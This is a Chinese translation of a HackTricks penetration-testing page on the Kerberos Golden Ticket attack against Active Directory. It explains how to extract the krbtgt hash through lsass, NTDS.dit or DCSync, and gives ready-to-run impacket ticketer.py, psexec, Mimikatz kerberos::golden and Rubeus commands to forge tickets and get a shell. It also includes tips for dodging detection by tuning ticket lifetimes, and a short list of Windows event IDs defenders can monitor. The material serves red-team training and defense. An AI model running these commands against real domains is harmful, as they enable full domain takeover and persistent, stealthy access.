hacktricks/windows-hardening/active-directory-methodology/golden-ticket.md

黄金票据

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品The PEASS Family

• 获取官方PEASS和HackTricks周边产品

• 加入💬 Discord群组或电报群组，或者关注我在Twitter上的🐦@carlospolopm。

• 通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享你的黑客技巧。

黄金票据

可以使用krbtgt AD账户的NTLM哈希创建一个有效的TGT（票据授予票证），而不是TGS（票据授予服务）。与TGS相比，伪造TGT的优势在于能够访问域中的任何服务（或机器）和被冒充的用户。此外，krbtgt的凭据从不会自动更改。

可以从域中的任何DC的lsass进程或NTDS.dit文件中获取krbtgt账户的NTLM哈希。还可以通过DCsync攻击获取该NTLM，可以使用Mimikatz的lsadump::dcsync模块或impacket示例secretsdump.py执行DCsync攻击。通常，无论使用哪种技术，都需要域管理员权限或类似权限。

还必须考虑到，最好（opsec）使用AES Kerberos密钥（AES128和AES256）来伪造票据。

{% code title="从Linux" %}

python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass

{% code title="来自Windows" %}

#mimikatz
kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist #List tickets in memory

# Example using aes key
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi

{% endcode %}

一旦你注入了黄金票据，你就可以访问共享文件**(C$)，并执行服务和WMI，所以你可以使用psexec或wmiexec**来获取一个shell（似乎你不能通过winrm获取一个shell）。

绕过常见的检测

检测黄金票据最常见的方法是通过检查Kerberos流量。默认情况下，Mimikatz将TGT签名为10年，这在随后使用它进行的TGS请求中会显得异常。

Lifetime : 3/11/2021 12:39:57 PM ; 3/9/2031 12:39:57 PM ; 3/9/2031 12:39:57 PM

使用/startoffset、/endin和/renewmax参数来控制开始偏移、持续时间和最大续订次数（都以分钟为单位）。

Get-DomainPolicy | select -expand KerberosPolicy

不幸的是，TGT的生命周期在4769中没有被记录，因此您在Windows事件日志中找不到这些信息。然而，您可以关联的是在没有先前的4768的情况下看到4769。没有TGT的情况下无法请求TGS，如果没有TGT被发行的记录，我们可以推断它是离线伪造的。

为了绕过这种检测，检查钻石票据：

{% content-ref url="diamond-ticket.md" %} diamond-ticket.md {% endcontent-ref %}

缓解措施

• 4624：帐户登录
• 4672：管理员登录
• Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List –Property

防御者可以采取的其他小技巧是对敏感用户（如默认域管理员帐户）的4769进行警报。

在ired.team上了解有关Golden Ticket的更多信息。

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 您在网络安全公司工作吗？您想在HackTricks中看到您的公司广告吗？或者您想获得最新版本的PEASS或下载PDF格式的HackTricks吗？请查看SUBSCRIPTION PLANS！

• 发现我们的独家NFT收藏品The PEASS Family

• 获取官方PEASS和HackTricks衣物

• 加入💬 Discord群组或电报群组，或在Twitter上关注我🐦@carlospolopm。

• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。